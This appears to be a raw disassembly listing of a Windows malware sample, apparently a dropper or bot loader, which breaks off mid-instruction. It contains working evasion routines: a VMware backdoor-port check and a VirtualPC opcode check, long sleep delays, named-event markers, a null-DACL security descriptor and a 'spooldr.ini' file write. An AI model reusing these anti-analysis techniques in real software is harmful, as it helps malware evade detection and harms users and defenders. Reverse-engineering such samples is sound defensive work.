sub_403061 proc near ; CODE XREF: sub_403061+25 p
push esi
push edi
mov edi, ecx
xor esi, esi
loc_403067: ; CODE XREF: loc_403067+12 j
mov ecx, [edi+esi*4]
mov eax, [ecx]
call dword ptr [eax+8]
inc esi
cmp esi, 2
jb short loc_403067
pop edi
pop esi
retn
sub_403061 endp
; =============== S U B R O U T I N E =======================================
sub_403078 proc near ; CODE XREF: sub_403078+5A p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
mov ecx, [esi]
push dword_421070
mov eax, [ecx]
call dword ptr [eax+0Ch]
test al, al
jnz short loc_4030A4
push [esp+4+arg_0]
mov ecx, [esi+4]
push dword_421070
mov eax, [ecx]
call dword ptr [eax+0Ch]
jmp short loc_4030A6
; ---------------------------------------------------------------------------
loc_4030A4: ; CODE XREF: loc_4030A4+16 j
mov al, 1
loc_4030A6: ; CODE XREF: loc_4030A6+2A j
pop esi
retn 4
sub_403078 endp
; =============== S U B R O U T I N E =======================================
sub_4030AA proc near ; CODE XREF: sub_4030AA+B3 p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
mov ecx, [esi]
push dword_421070
mov eax, [ecx]
call dword ptr [eax+10h]
test al, al
jz short loc_4030DD
push [esp+4+arg_0]
mov ecx, [esi+4]
push dword_421070
mov eax, [ecx]
call dword ptr [eax+10h]
test al, al
jz short loc_4030DD
xor eax, eax
inc eax
jmp short loc_4030DF
; ---------------------------------------------------------------------------
loc_4030DD: ; CODE XREF: loc_4030DD+16 j
; sub_4030AA+2C j
xor eax, eax
loc_4030DF: ; CODE XREF: loc_4030DF+31 j
pop esi
retn 4
sub_4030AA endp
; =============== S U B R O U T I N E =======================================
sub_4030E3 proc near ; CODE XREF: sub_4030E3+4F p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
mov ecx, [esi]
push dword_421074
mov eax, [ecx]
call dword ptr [eax+0Ch]
test al, al
jnz short loc_40310F
push [esp+4+arg_0]
mov ecx, [esi+4]
push dword_421074
mov eax, [ecx]
call dword ptr [eax+0Ch]
jmp short loc_403111
; ---------------------------------------------------------------------------
loc_40310F: ; CODE XREF: loc_40310F+16 j
mov al, 1
loc_403111: ; CODE XREF: loc_403111+2A j
pop esi
retn 4
sub_4030E3 endp
; =============== S U B R O U T I N E =======================================
sub_403115 proc near ; CODE XREF: sub_403115+24A p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
mov ecx, [esi]
push dword_421074
mov eax, [ecx]
call dword ptr [eax+10h]
test al, al
jz short loc_403148
push [esp+4+arg_0]
mov ecx, [esi+4]
push dword_421074
mov eax, [ecx]
call dword ptr [eax+10h]
test al, al
jz short loc_403148
xor eax, eax
inc eax
jmp short loc_40314A
; ---------------------------------------------------------------------------
loc_403148: ; CODE XREF: loc_403148+16 j
; sub_403115+2C j
xor eax, eax
loc_40314A: ; CODE XREF: loc_40314A+31 j
pop esi
retn 4
sub_403115 endp
; ---------------------------------------------------------------------------
loc_40314E: ; CODE XREF: loc_40314E+13 p
push 14h
push offset dword_420358
call __SEH_prolog
mov byte ptr [ebp-19h], 0
and dword ptr [ebp-4], 0
push ebx
mov ebx, 0
mov eax, 1
; ---------------------------------------------------------------------------
db 0Fh, 3Fh, 7
dd 0FDB850Bh, 5BE74594h, 458B35EBh, 0DC4589ECh, 8BDC458Bh
dd 45890440h, 0E0458BE0h, 0A48883h, 8BFF0000h, 808BE045h
dd 0B8h, 8B04C083h, 8189E04Dh, 0B8h, 0C3FFC883h, 83E8658Bh
dd 8AFFFC4Dh, 0ECE8E745h, 0C3000141h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4031BC proc near ; CODE XREF: sub_4031BC+6 p
var_19 = byte ptr -19h
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_420368
call __SEH_prolog
mov [ebp+var_19], 1
and [ebp+ms_exc.disabled], 0
push edx
push ecx
push ebx
mov eax, 564D5868h
mov ebx, 0
mov ecx, 0Ah
mov edx, 5658h
in eax, dx
cmp ebx, 564D5868h
setz [ebp+var_19]
pop ebx
pop ecx
pop edx
jmp short loc_403202
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+var_19], 0
loc_403202: ; CODE XREF: loc_403202+39 j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov al, [ebp+var_19]
call __SEH_epilog
retn
sub_4031BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40320F proc near ; CODE XREF: sub_40320F+7A p
var_114 = byte ptr -114h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
push ebp
mov ebp, esp
sub esp, 114h
push ebx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_114]
push eax
push 104h
push offset aSpooldr_ini_0 ; "spooldr.ini"
call GetFullPathNameA
lea eax, [ebp+var_114]
push eax
call GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_4032C4
xor ebx, ebx
push ebx
push 80h
push 2
push ebx
push 7
push 40000000h
lea eax, [ebp+var_114]
push eax
call CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_403271
xor al, al
jmp short loc_4032C6
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: loc_403271+5C j
push esi
push edi
mov edi, ds:dword_4180FC
loc_403279: ; CODE XREF: loc_403279+A8 j
push 0
lea eax, [ebp+var_C]
push eax
lea esi, dword_421218[ebx]
push dword ptr [esi]
call sub_40CD83
pop ecx
push eax
push dword ptr [esi]
push [ebp+var_8]
call WriteFile ; df--HS
push 0
lea eax, [ebp+var_C]
push eax
push 2
lea eax, [ebp+var_4]
push eax
push [ebp+var_8]
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
call WriteFile ; df--HS
add ebx, 4
cmp ebx, 494h
jb short loc_403279
push [ebp+var_8]
call CloseHandle
pop edi
pop esi
loc_4032C4: ; CODE XREF: loc_4032C4+35 j
mov al, 1
loc_4032C6: ; CODE XREF: loc_4032C6+60 j
pop ebx
leave
retn
sub_40320F endp
; =============== S U B R O U T I N E =======================================
sub_4032C9 proc near ; CODE XREF: sub_4032C9+36 p
arg_0 = dword ptr 4
push esi
push 14h
push 0
mov esi, offset dword_421CD8
push esi
call sub_40CCD9
add esp, 0Ch
push 1
push esi
call InitializeSecurityDescriptor
test eax, eax
jnz short loc_4032ED
loc_4032E9: ; CODE XREF: loc_4032E9+33 j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4032ED: ; CODE XREF: loc_4032ED+1E j
push 0
push 0
push 1
push esi
call SetSecurityDescriptorDacl
test eax, eax
jz short loc_4032E9
mov eax, [esp+4+arg_0]
mov [eax+4], esi
mov dword ptr [eax], 0Ch
mov dword ptr [eax+8], 1
mov al, 1
pop esi
retn
sub_4032C9 endp
; =============== S U B R O U T I N E =======================================
sub_403316 proc near ; CODE XREF: sub_403316+13 p
; sub_403389+13A p ...
push ebx
push esi
push offset aIu6uu3wjjhfWyh ; "Iu6Uu3wJJHF%WYHS"
xor ebx, ebx
push ebx
push 2
call OpenEventW
mov esi, eax
cmp esi, ebx
jz short loc_403341
push esi
call SetEvent
test eax, eax
push esi
setnz bl
call CloseHandle
loc_403341: ; CODE XREF: loc_403341+16 j
pop esi
mov al, bl
pop ebx
retn
sub_403316 endp
; =============== S U B R O U T I N E =======================================
sub_403346 proc near ; CODE XREF: sub_403346+8 p
; sub_403389+12C p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push [esp+arg_4]
jz short loc_403362
push [esp+4+arg_0]
call WaitForSingleObject
test eax, eax
jnz short loc_403368
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_403362: ; CODE XREF: loc_403362+9 j
call Sleep
loc_403368: ; CODE XREF: loc_403368+17 j
xor al, al
retn
sub_403346 endp
; =============== S U B R O U T I N E =======================================
sub_40336B proc near ; CODE XREF: sub_40336B+94 p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_403346
test al, al
pop ecx
pop ecx
jz short loc_403386
call sub_403316
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_403386: ; CODE XREF: loc_403386+11 j
xor al, al
retn
sub_40336B endp
; =============== S U B R O U T I N E =======================================
sub_403389 proc near ; CODE XREF: start+2 p
var_191 = byte ptr -191h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
sub esp, 1A4h
call sub_4031BC
test al, al
jnz loc_403524
call loc_40314E
test al, al
jnz loc_403524
push ebx
push ebp
mov ebp, ds:dword_4180C8
push esi
push edi
push 4E20h
call Sleep ; df--HS
loc_4033BA: ; CODE XREF: loc_4033BA+162 j
; sub_403389+16E j
lea eax, [esp+1A4h+var_18C]
push eax
call sub_4032C9
pop ecx
mov esi, offset aK8jt6hnjmJuiWw ; "K8JT6Hnjm$#jui#WWhHHgG"
push esi
xor ebx, ebx
push ebx
push ebx
lea eax, [esp+1B0h+var_18C]
push eax
call CreateEventA
mov edi, eax
cmp edi, ebx
jnz short loc_4033FC
call GetLastError
cmp eax, 0B7h
jnz short loc_4033FC
push esi
push ebx
push 1F0003h
call OpenEventA
mov edi, eax
loc_4033FC: ; CODE XREF: loc_4033FC+55 j
; sub_403389+62 j
push 7530h
call Sleep ; df--HS
call sub_40320F
lea eax, [esp+1ACh+var_188]
push eax
push 2
call ds:dword_4181B4
jmp short loc_403439
; ---------------------------------------------------------------------------
loc_403417: ; CODE XREF: loc_403417+C1 j
push 927C0h
push edi
call sub_40336B
test al, al
pop ecx
pop ecx
jz short loc_40342A
mov bl, 1
loc_40342A: ; CODE XREF: loc_40342A+9D j
mov eax, [esi]
mov ecx, esi
call dword ptr [eax+4]
test bl, bl
jnz loc_403505
loc_403439: ; CODE XREF: loc_403439+8C j
xor bl, bl
call sub_40BF8E
mov esi, eax
mov eax, [esi]
mov ecx, esi
call dword ptr [eax]
test al, al
jz short loc_403417
push 0EA60h
call Sleep ; df--HS
and [esp+1A4h+var_190], 0
mov [esp+1A4h+var_191], 1
mov eax, [esi]
mov ecx, esi
call dword ptr [eax+10h]
test al, al
jz short loc_403487
push 130h
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_4034A6
lea ecx, [esp+1A4h+var_191]
push ecx
push edi
push esi
mov ecx, eax
call sub_406E37
jmp short loc_4034A8
; ---------------------------------------------------------------------------
loc_403487: ; CODE XREF: loc_403487+DD j
push 51A0h
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_4034A6
lea ecx, [esp+1A4h+var_191]
push ecx
push edi
push esi
mov ecx, eax
call sub_4058DF
jmp short loc_4034A8
; ---------------------------------------------------------------------------
loc_4034A6: ; CODE XREF: loc_4034A6+EC j
; sub_403389+10B j
xor eax, eax
loc_4034A8: ; CODE XREF: loc_4034A8+FC j
; sub_403389+11B j
push eax
lea ecx, [esp+1A8h+var_190]
call sub_404191
push 0FFFFFFFFh
push edi
call sub_403346
cmp [esp+1ACh+var_191], 0
pop ecx
pop ecx
jz short loc_4034C8
call sub_403316
loc_4034C8: ; CODE XREF: loc_4034C8+138 j
push 0
lea ecx, [esp+1A8h+var_190]
call sub_404191
test edi, edi
jz short loc_4034DE
push edi
call CloseHandle
loc_4034DE: ; CODE XREF: loc_4034DE+14C j
cmp [esp+1A4h+var_191], 0
jnz short loc_4034FC
mov ecx, [esp+1A4h+var_190]
test ecx, ecx
jz loc_4033BA
mov eax, [ecx]
push 1
call dword ptr [eax]
jmp loc_4033BA
; ---------------------------------------------------------------------------
loc_4034FC: ; CODE XREF: loc_4034FC+15A j
; sub_403389+17A j
push 5F5E100h
call Sleep ; df--HS
jmp short loc_4034FC
; ---------------------------------------------------------------------------
loc_403505: ; CODE XREF: loc_403505+AA j
call sub_403316
test edi, edi
jz short loc_403515
push edi
call CloseHandle
loc_403515: ; CODE XREF: loc_403515+183 j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 1A4h
retn 4
; ---------------------------------------------------------------------------
loc_403524: ; CODE XREF: loc_403524+D j
; sub_403389+1A j ...
push 5F5E100h
call Sleep
jmp short loc_403524
sub_403389 endp
; =============== S U B R O U T I N E =======================================
public start
start proc near
push 0
call sub_403389
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_403539 proc near ; CODE XREF: sub_403539+3F p
var_114 = byte ptr -114h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 114h
lea eax, [ebp+74h+var_94]
push eax
mov [ebp+74h+var_94], 94h
call GetVersionExA
mov eax, [ebp+74h+var_90]
sub eax, 3
jz loc_4035F9
dec eax
mov ecx, [ebp+74h+var_8C]
jz short loc_403599
dec eax
jz short loc_403577
dec eax
jnz short loc_4035A7
push offset aWindowsVista ; "Windows Vista"
jmp loc_4035FE
; ---------------------------------------------------------------------------
loc_403577: ; CODE XREF: loc_403577+2F j
mov eax, ecx
sub eax, 0
jz short loc_403592
dec eax
jz short loc_40358B
dec eax
jnz sho